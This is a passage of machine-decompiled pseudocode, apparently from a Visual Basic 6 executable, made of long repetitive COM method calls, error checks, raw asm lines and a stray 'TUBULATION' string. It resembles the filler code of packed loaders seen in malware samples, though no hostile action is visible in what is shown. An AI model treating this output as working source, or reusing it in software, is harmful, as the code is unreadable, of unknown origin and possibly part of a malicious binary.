				_push(_v256);
				_t1730 =  &_v308;
				_push(_t1730);
				L004017CA();
				_t2804 = _t2803 + 0x10;
				_push(_t1730);
				L004017B2();
				_push(_t1730);
				_t1731 =  &_v292;
				_push(_t1731);
				L004017B2();
				_push(_t1731);
				_t1732 =  &_v276;
				_push(_t1732);
				L004017B2();
				_push(_t1732);
				E00404D00();
				_v480 = _t1732;
				L004017AC();
				if( *0x425010 != 0) {
					_v632 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v632 = 0x425010;
				}
				_t1736 =  &_v260;
				L004017C4();
				_v524 = _t1736;
				_t1740 =  *((intOrPtr*)( *_v524 + 0x60))(_v524,  &_v484, _t1736,  *((intOrPtr*)( *((intOrPtr*)( *_v632)) + 0x300))( *_v632));
				asm("fclex");
				_v528 = _t1740;
				if(_v528 >= 0) {
					_v636 = _v636 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x405048);
					_push(_v524);
					_push(_v528);
					L004017B8();
					_v636 = _t1740;
				}
				asm("sbb eax, eax");
				_v532 =  ~( ~(_v480 - _v484) + 1);
				_push( &_v260);
				_push( &_v256);
				_push( &_v248);
				_push( &_v240);
				_push( &_v252);
				_push( &_v244);
				_push( &_v236);
				_push(7);
				L004017A6();
				_push( &_v308);
				_push( &_v292);
				_push( &_v276);
				_push(3);
				L004017A0();
				_t2806 = _t2804 + 0x30;
				if(_v532 != 0) {
					_v8 = 3;
					_v268 = 0x80020004;
					_v276 = 0xa;
					_t2323 =  &_v276;
					_push(_t2323);
					L0040179A();
					_v188 = _t2323;
					L00401794();
					_v8 = 4;
					if( *0x425698 != 0) {
						_v640 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v640 = 0x425698;
					}
					_v500 =  *_v640;
					_t2329 =  *((intOrPtr*)( *_v500 + 0x4c))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t2329;
					if(_v504 >= 0) {
						_v644 = _v644 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x405068);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v644 = _t2329;
					}
					_v508 = _v236;
					_t2333 =  *((intOrPtr*)( *_v508 + 0x28))(_v508);
					asm("fclex");
					_v512 = _t2333;
					if(_v512 >= 0) {
						_v648 = _v648 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x405088);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v648 = _t2333;
					}
					L0040178E();
					_v8 = 5;
					_v8 = 6;
					_push(0x74);
					L00401788();
					_v88 = _t2333;
				}
				_v8 = 8;
				if( *0x425010 != 0) {
					_v652 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v652 = 0x425010;
				}
				_t1760 =  &_v236;
				L004017C4();
				_v500 = _t1760;
				_t1764 =  *((intOrPtr*)( *_v500 + 0x180))(_v500,  &_v480, _t1760,  *((intOrPtr*)( *((intOrPtr*)( *_v652)) + 0x300))( *_v652));
				asm("fclex");
				_v504 = _t1764;
				if(_v504 >= 0) {
					_v656 = _v656 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x405048);
					_push(_v500);
					_push(_v504);
					L004017B8();
					_v656 = _t1764;
				}
				if( *0x425010 != 0) {
					_v660 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v660 = 0x425010;
				}
				_t1768 =  &_v240;
				L004017C4();
				_v508 = _t1768;
				_t1772 =  *((intOrPtr*)( *_v508 + 0x100))(_v508,  &_v244, _t1768,  *((intOrPtr*)( *((intOrPtr*)( *_v660)) + 0x300))( *_v660));
				asm("fclex");
				_v512 = _t1772;
				if(_v512 >= 0) {
					_v664 = _v664 & 0x00000000;
				} else {
					_push(0x100);
					_push(0x405048);
					_push(_v508);
					_push(_v512);
					L004017B8();
					_v664 = _t1772;
				}
				_push(0);
				_push(0);
				_push(_v244);
				_push( &_v276);
				L004017CA();
				_t2807 = _t2806 + 0x10;
				if( *0x425010 != 0) {
					_v668 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v668 = 0x425010;
				}
				_t1777 =  &_v248;
				L004017C4();
				_v516 = _t1777;
				_t1781 =  *((intOrPtr*)( *_v516 + 0x110))(_v516,  &_v252, _t1777,  *((intOrPtr*)( *((intOrPtr*)( *_v668)) + 0x304))( *_v668));
				asm("fclex");
				_v520 = _t1781;
				if(_v520 >= 0) {
					_v672 = _v672 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x405098);
					_push(_v516);
					_push(_v520);
					L004017B8();
					_v672 = _t1781;
				}
				_push(0);
				_push(0);
				_push(_v252);
				_push( &_v292);
				L004017CA();
				_t2808 = _t2807 + 0x10;
				if( *0x425010 != 0) {
					_v676 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v676 = 0x425010;
				}
				_t1786 =  &_v256;
				L004017C4();
				_v524 = _t1786;
				_t1790 =  *((intOrPtr*)( *_v524 + 0x198))(_v524,  &_v484, _t1786,  *((intOrPtr*)( *((intOrPtr*)( *_v676)) + 0x308))( *_v676));
				asm("fclex");
				_v528 = _t1790;
				if(_v528 >= 0) {
					_v680 = _v680 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x405038);
					_push(_v524);
					_push(_v528);
					L004017B8();
					_v680 = _t1790;
				}
				_push( &_v220);
				_push(_v484);
				_push( &_v180);
				_push( &_v112);
				_t1794 =  &_v292;
				_push(_t1794);
				L004017B2();
				_push(_t1794);
				_t1795 =  &_v276;
				_push(_t1795);
				L004017B2();
				_push(_t1795);
				_push(_v480);
				E00404D70();
				_v488 = _t1795;
				L004017AC();
				_v532 =  ~(0 | _v488 == 0x00012c78);
				_push( &_v252);
				_push( &_v244);
				_push( &_v256);
				_push( &_v248);
				_push( &_v240);
				_push( &_v236);
				_push(6);
				L004017A6();
				_push( &_v292);
				_push( &_v276);
				_push(2);
				L004017A0();
				_t2810 = _t2808 + 0x28;
				if(_v532 != 0) {
					_v8 = 9;
					if( *0x425698 != 0) {
						_v684 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v684 = 0x425698;
					}
					_v500 =  *_v684;
					_t2297 =  *((intOrPtr*)( *_v500 + 0x14))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t2297;
					if(_v504 >= 0) {
						_v688 = _v688 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v688 = _t2297;
					}
					_v508 = _v236;
					_t2302 =  *((intOrPtr*)( *_v508 + 0x78))(_v508,  &_v476);
					asm("fclex");
					_v512 = _t2302;
					if(_v512 >= 0) {
						_v692 = _v692 & 0x00000000;
					} else {
						_push(0x78);
						_push(0x4050a8);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v692 = _t2302;
					}
					_v84 = _v476;
					L0040178E();
					_v8 = 0xa;
					if( *0x425698 != 0) {
						_v696 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v696 = 0x425698;
					}
					_v500 =  *_v696;
					_t2309 =  *((intOrPtr*)( *_v500 + 0x14))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t2309;
					if(_v504 >= 0) {
						_v700 = _v700 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v700 = _t2309;
					}
					_v508 = _v236;
					_t2314 =  *((intOrPtr*)( *_v508 + 0x140))(_v508,  &_v476);
					asm("fclex");
					_v512 = _t2314;
					if(_v512 >= 0) {
						_v704 = _v704 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050a8);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v704 = _t2314;
					}
					_v60 = _v476;
					L0040178E();
					_v8 = 0xb;
					if( *0x425698 != 0) {
						_v708 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v708 = 0x425698;
					}
					_v500 =  *_v708;
					_t2318 =  &_v80;
					L0040177C();
					_t2319 =  &_v236;
					L00401782();
					_t2322 =  *((intOrPtr*)( *_v500 + 0x10))(_v500, _t2319, _t2319, _t2318, _t2318);
					asm("fclex");
					_v504 = _t2322;
					if(_v504 >= 0) {
						_v712 = _v712 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x405068);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v712 = _t2322;
					}
					L0040178E();
				}
				_v8 = 0xd;
				if( *0x425010 != 0) {
					_v716 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404358);
					L004017BE();
					_v716 = 0x425010;
				}
				_t1811 =  &_v236;
				L004017C4();
				_v500 = _t1811;
				_t1814 =  *((intOrPtr*)( *_v500 + 0x20c))(_v500, _t1811,  *((intOrPtr*)( *((intOrPtr*)( *_v716)) + 0x30c))( *_v716));
				asm("fclex");
				_v504 = _t1814;
				if(_v504 >= 0) {
					_v720 = _v720 & 0x00000000;
				} else {
					_push(0x20c);
					_push(0x405038);
					_push(_v500);
					_push(_v504);
					L004017B8();
					_v720 = _t1814;
				}
				_t2362 =  &_v236;
				L0040178E();
				_v8 = 0xe;
				_v268 = 0x80020004;
				_v276 = 0xa;
				_push( &_v276);
				_push( &_v292);
				L00401770();
				_v400 = L"TUBULATION";
				_v408 = 0x8008;
				_push( &_v292);
				_t1818 =  &_v408;
				_push(_t1818);
				L00401776();
				_v500 = _t1818;
				_push( &_v292);
				_push( &_v276);
				_push(2);
				L004017A0();
				_t2811 = _t2810 + 0xc;
				_t1821 = _v500;
				if(_t1821 != 0) {
					_v8 = 0xf;
					_v300 = 0x80020004;
					_v308 = 0xa;
					_v284 = 0x80020004;
					_v292 = 0xa;
					_v268 = 0x80020004;
					_v276 = 0xa;
					_push( &_v308);
					_push( &_v292);
					_push( &_v276);
					_t2951 =  *0x401408;
					_push(_t2362);
					_push(_t2362);
					_v324 = _t2951;
					asm("fld1");
					_push(_t2362);
					_push(_t2362);
					_v332 = _t2951;
					asm("fld1");
					_push(_t2362);
					_push(_t2362);
					_v340 = _t2951;
					L0040176A();
					_v196 = _t2951;
					_push( &_v308);
					_push( &_v292);
					_push( &_v276);
					_push(3);
					L004017A0();
					_t2820 = _t2811 + 0x10;
					_v8 = 0x10;
					_push( &_v276);
					L00401758();
					_push(1);
					_push( &_v276);
					_push( &_v292);
					L0040175E();
					L00401764();
					L00401794();
					_v8 = 0x11;
					_v8 = 0x12;
					_v364 = 0x80020004;
					_v372 = 0xa;
					_v348 = 0x80020004;
					_v356 = 0xa;
					_v332 = 0x80020004;
					_v340 = 0xa;
					_v316 = 0x80020004;
					_v324 = 0xa;
					_v300 = 0x80020004;
					_v308 = 0xa;
					_v284 = 0x80020004;
					_v292 = 0xa;
					if( *0x425010 != 0) {
						_v724 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v724 = 0x425010;
					}
					_t2272 =  &_v236;
					L004017C4();
					_v500 = _t2272;
					_t2276 =  *((intOrPtr*)( *_v500 + 0x120))(_v500,  &_v224, _t2272,  *((intOrPtr*)( *((intOrPtr*)( *_v724)) + 0x304))( *_v724));
					asm("fclex");
					_v504 = _t2276;
					if(_v504 >= 0) {
						_v728 = _v728 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x405098);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v728 = _t2276;
					}
					_v588 = _v224;
					_v224 = _v224 & 0x00000000;
					_v268 = _v588;
					_v276 = 8;
					_push( &_v372);
					_push( &_v356);
					_push( &_v340);
					_push( &_v324);
					_push( &_v308);
					_push( &_v292);
					_push( &_v276);
					L0040174C();
					L00401752();
					L0040178E();
					_push( &_v372);
					_push( &_v356);
					_push( &_v340);
					_push( &_v324);
					_push( &_v308);
					_push( &_v292);
					_t1821 =  &_v276;
					_push(_t1821);
					_push(7);
					L004017A0();
					_t2811 = _t2820 + 0x20;
				}
				_v8 = 0x14;
				_push(0x4050bc);
				L00401746();
				if(_t1821 != 2) {
					_v8 = 0x15;
					if( *0x425698 != 0) {
						_v732 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v732 = 0x425698;
					}
					_v508 =  *_v732;
					_t1969 =  *((intOrPtr*)( *_v508 + 0x14))(_v508,  &_v240);
					asm("fclex");
					_v512 = _t1969;
					if(_v512 >= 0) {
						_v736 = _v736 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v736 = _t1969;
					}
					_v516 = _v240;
					_v384 = 0x80020004;
					_v392 = 0xa;
					if( *0x425010 != 0) {
						_v740 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v740 = 0x425010;
					}
					_t1974 =  &_v236;
					L004017C4();
					_v500 = _t1974;
					_t1978 =  *((intOrPtr*)( *_v500 + 0x1c0))(_v500,  &_v224, _t1974,  *((intOrPtr*)( *((intOrPtr*)( *_v740)) + 0x308))( *_v740));
					asm("fclex");
					_v504 = _t1978;
					if(_v504 >= 0) {
						_v744 = _v744 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v744 = _t1978;
					}
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t1982 =  *((intOrPtr*)( *_v516 + 0x13c))(_v516, _v224, 0x10);
					asm("fclex");
					_v520 = _t1982;
					if(_v520 >= 0) {
						_v748 = _v748 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4050a8);
						_push(_v516);
						_push(_v520);
						L004017B8();
						_v748 = _t1982;
					}
					L00401740();
					_push( &_v240);
					_push( &_v236);
					_push(2);
					L004017A6();
					_v8 = 0x16;
					_push(0);
					_push(0x44);
					_push(1);
					_push(8);
					_push( &_v184);
					_push(4);
					_push(0x180);
					L0040173A();
					_t2816 = _t2811 + 0x28;
					_v8 = 0x17;
					_push(0);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x18;
					if( *0x425010 != 0) {
						_v752 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v752 = 0x425010;
					}
					_t1989 =  &_v236;
					L004017C4();
					_v500 = _t1989;
					_t1993 =  *((intOrPtr*)( *_v500 + 0x1c0))(_v500,  &_v224, _t1989,  *((intOrPtr*)( *((intOrPtr*)( *_v752)) + 0x308))( *_v752));
					asm("fclex");
					_v504 = _t1993;
					if(_v504 >= 0) {
						_v756 = _v756 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v756 = _t1993;
					}
					_push(1);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x19;
					_push(2);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x1a;
					_push(3);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x1b;
					if( *0x425010 != 0) {
						_v760 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v760 = 0x425010;
					}
					_t1997 =  &_v236;
					L004017C4();
					_v500 = _t1997;
					_t2001 =  *((intOrPtr*)( *_v500 + 0xa8))(_v500,  &_v224, _t1997,  *((intOrPtr*)( *((intOrPtr*)( *_v760)) + 0x30c))( *_v760));
					asm("fclex");
					_v504 = _t2001;
					if(_v504 >= 0) {
						_v764 = _v764 & 0x00000000;
					} else {
						_push(0xa8);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v764 = _t2001;
					}
					_push(4);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x1c;
					if( *0x425010 != 0) {
						_v768 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v768 = 0x425010;
					}
					_t2005 =  &_v236;
					L004017C4();
					_v500 = _t2005;
					_t2009 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2005,  *((intOrPtr*)( *((intOrPtr*)( *_v768)) + 0x300))( *_v768));
					asm("fclex");
					_v504 = _t2009;
					if(_v504 >= 0) {
						_v772 = _v772 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405048);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v772 = _t2009;
					}
					_push(5);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x1d;
					_push(6);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x1e;
					_push(7);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x1f;
					_push(8);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x20;
					_push(9);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x21;
					if( *0x425010 != 0) {
						_v776 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v776 = 0x425010;
					}
					_t2013 =  &_v236;
					L004017C4();
					_v500 = _t2013;
					_t2017 =  *((intOrPtr*)( *_v500 + 0xf8))(_v500, 0,  &_v224, _t2013,  *((intOrPtr*)( *((intOrPtr*)( *_v776)) + 0x308))( *_v776));
					asm("fclex");
					_v504 = _t2017;
					if(_v504 >= 0) {
						_v780 = _v780 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v780 = _t2017;
					}
					_push(0xa);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x22;
					if( *0x425010 != 0) {
						_v784 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v784 = 0x425010;
					}
					_t2021 =  &_v236;
					L004017C4();
					_v500 = _t2021;
					_t2025 =  *((intOrPtr*)( *_v500 + 0x130))(_v500,  &_v240, _t2021,  *((intOrPtr*)( *((intOrPtr*)( *_v784)) + 0x300))( *_v784));
					asm("fclex");
					_v504 = _t2025;
					if(_v504 >= 0) {
						_v788 = _v788 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x405048);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v788 = _t2025;
					}
					_push(0);
					_push(0);
					_push(_v240);
					_t2026 =  &_v276;
					_push(_t2026);
					L004017CA();
					_push(_t2026);
					L00401728();
					L00401752();
					_push(0xb);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					_push( &_v240);
					_push( &_v236);
					_push(2);
					L004017A6();
					_t2818 = _t2816 + 0x1c;
					L00401794();
					_v8 = 0x23;
					if( *0x425010 != 0) {
						_v792 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v792 = 0x425010;
					}
					_t2032 =  &_v236;
					L004017C4();
					_v500 = _t2032;
					_t2036 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2032,  *((intOrPtr*)( *((intOrPtr*)( *_v792)) + 0x304))( *_v792));
					asm("fclex");
					_v504 = _t2036;
					if(_v504 >= 0) {
						_v796 = _v796 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405098);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v796 = _t2036;
					}
					_push(0xc);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x24;
					_push(0xd);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x25;
					if( *0x425010 != 0) {
						_v800 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v800 = 0x425010;
					}
					_t2040 =  &_v236;
					L004017C4();
					_v500 = _t2040;
					_t2044 =  *((intOrPtr*)( *_v500 + 0xe8))(_v500, 0,  &_v224, _t2040,  *((intOrPtr*)( *((intOrPtr*)( *_v800)) + 0x304))( *_v800));
					asm("fclex");
					_v504 = _t2044;
					if(_v504 >= 0) {
						_v804 = _v804 & 0x00000000;
					} else {
						_push(0xe8);
						_push(0x405098);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v804 = _t2044;
					}
					_push(0xe);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x26;
					_push(0xf);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x27;
					if( *0x425010 != 0) {
						_v808 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v808 = 0x425010;
					}
					_t2048 =  &_v236;
					L004017C4();
					_v500 = _t2048;
					_t2052 =  *((intOrPtr*)( *_v500 + 0x188))(_v500,  &_v224, _t2048,  *((intOrPtr*)( *((intOrPtr*)( *_v808)) + 0x30c))( *_v808));
					asm("fclex");
					_v504 = _t2052;
					if(_v504 >= 0) {
						_v812 = _v812 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v812 = _t2052;
					}
					_push(0x10);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x28;
					_push(0x11);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x29;
					_push(0x12);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x2a;
					_push(0x13);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x2b;
					if( *0x425010 != 0) {
						_v816 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v816 = 0x425010;
					}
					_t2056 =  &_v236;
					L004017C4();
					_v500 = _t2056;
					_t2060 =  *((intOrPtr*)( *_v500 + 0x188))(_v500,  &_v224, _t2056,  *((intOrPtr*)( *((intOrPtr*)( *_v816)) + 0x308))( *_v816));
					asm("fclex");
					_v504 = _t2060;
					if(_v504 >= 0) {
						_v820 = _v820 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v820 = _t2060;
					}
					_push(0x14);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x2c;
					_push(0x15);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x2d;
					_push(0x16);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x2e;
					if( *0x425010 != 0) {
						_v824 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v824 = 0x425010;
					}
					_t2064 =  &_v236;
					L004017C4();
					_v500 = _t2064;
					_t2068 =  *((intOrPtr*)( *_v500 + 0x110))(_v500,  &_v224, _t2064,  *((intOrPtr*)( *((intOrPtr*)( *_v824)) + 0x300))( *_v824));
					asm("fclex");
					_v504 = _t2068;
					if(_v504 >= 0) {
						_v828 = _v828 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x405048);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v828 = _t2068;
					}
					_push(0x17);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x2f;
					_push(0x18);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x30;
					_push(0x19);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x31;
					if( *0x425010 != 0) {
						_v832 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v832 = 0x425010;
					}
					_t2072 =  &_v236;
					L004017C4();
					_v500 = _t2072;
					_t2076 =  *((intOrPtr*)( *_v500 + 0x1c0))(_v500,  &_v224, _t2072,  *((intOrPtr*)( *((intOrPtr*)( *_v832)) + 0x308))( *_v832));
					asm("fclex");
					_v504 = _t2076;
					if(_v504 >= 0) {
						_v836 = _v836 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v836 = _t2076;
					}
					_push(0x1a);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x32;
					_push(0x1b);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x33;
					if( *0x425010 != 0) {
						_v840 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v840 = 0x425010;
					}
					_t2080 =  &_v236;
					L004017C4();
					_v500 = _t2080;
					_t2084 =  *((intOrPtr*)( *_v500 + 0xf8))(_v500, 0,  &_v224, _t2080,  *((intOrPtr*)( *((intOrPtr*)( *_v840)) + 0x30c))( *_v840));
					asm("fclex");
					_v504 = _t2084;
					if(_v504 >= 0) {
						_v844 = _v844 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v844 = _t2084;
					}
					_push(0x1c);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x34;
					if( *0x425010 != 0) {
						_v848 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v848 = 0x425010;
					}
					_t2088 =  &_v236;
					L004017C4();
					_v500 = _t2088;
					_t2092 =  *((intOrPtr*)( *_v500 + 0x70))(_v500,  &_v224, _t2088,  *((intOrPtr*)( *((intOrPtr*)( *_v848)) + 0x2fc))( *_v848));
					asm("fclex");
					_v504 = _t2092;
					if(_v504 >= 0) {
						_v852 = _v852 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4052ac);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v852 = _t2092;
					}
					_push(0x1d);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x35;
					_push(0x1e);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x36;
					if( *0x425010 != 0) {
						_v856 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v856 = 0x425010;
					}
					_t2096 =  &_v236;
					L004017C4();
					_v500 = _t2096;
					_t2100 =  *((intOrPtr*)( *_v500 + 0xf8))(_v500, 0,  &_v224, _t2096,  *((intOrPtr*)( *((intOrPtr*)( *_v856)) + 0x308))( *_v856));
					asm("fclex");
					_v504 = _t2100;
					if(_v504 >= 0) {
						_v860 = _v860 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v860 = _t2100;
					}
					_push(0x1f);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x37;
					_push(0x20);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x38;
					if( *0x425010 != 0) {
						_v864 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v864 = 0x425010;
					}
					_t2104 =  &_v236;
					L004017C4();
					_v500 = _t2104;
					_t2108 =  *((intOrPtr*)( *_v500 + 0x190))(_v500,  &_v224, _t2104,  *((intOrPtr*)( *((intOrPtr*)( *_v864)) + 0x304))( *_v864));
					asm("fclex");
					_v504 = _t2108;
					if(_v504 >= 0) {
						_v868 = _v868 & 0x00000000;
					} else {
						_push(0x190);
						_push(0x405098);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v868 = _t2108;
					}
					_push(0x21);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x39;
					if( *0x425010 != 0) {
						_v872 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v872 = 0x425010;
					}
					_t2112 =  &_v236;
					L004017C4();
					_v500 = _t2112;
					_t2116 =  *((intOrPtr*)( *_v500 + 0x120))(_v500,  &_v224, _t2112,  *((intOrPtr*)( *((intOrPtr*)( *_v872)) + 0x304))( *_v872));
					asm("fclex");
					_v504 = _t2116;
					if(_v504 >= 0) {
						_v876 = _v876 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x405098);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v876 = _t2116;
					}
					_push(0x22);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3a;
					if( *0x425010 != 0) {
						_v880 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v880 = 0x425010;
					}
					_t2120 =  &_v236;
					L004017C4();
					_v500 = _t2120;
					_t2124 =  *((intOrPtr*)( *_v500 + 0x1c0))(_v500,  &_v224, _t2120,  *((intOrPtr*)( *((intOrPtr*)( *_v880)) + 0x30c))( *_v880));
					asm("fclex");
					_v504 = _t2124;
					if(_v504 >= 0) {
						_v884 = _v884 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v884 = _t2124;
					}
					_push(0x23);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3b;
					_push(0x24);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x3c;
					if( *0x425010 != 0) {
						_v888 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v888 = 0x425010;
					}
					_t2128 =  &_v236;
					L004017C4();
					_v500 = _t2128;
					_t2132 =  *((intOrPtr*)( *_v500 + 0xf8))(_v500, 0,  &_v224, _t2128,  *((intOrPtr*)( *((intOrPtr*)( *_v888)) + 0x308))( *_v888));
					asm("fclex");
					_v504 = _t2132;
					if(_v504 >= 0) {
						_v892 = _v892 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x405038);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v892 = _t2132;
					}
					_push(0x25);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3d;
					if( *0x425010 != 0) {
						_v896 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
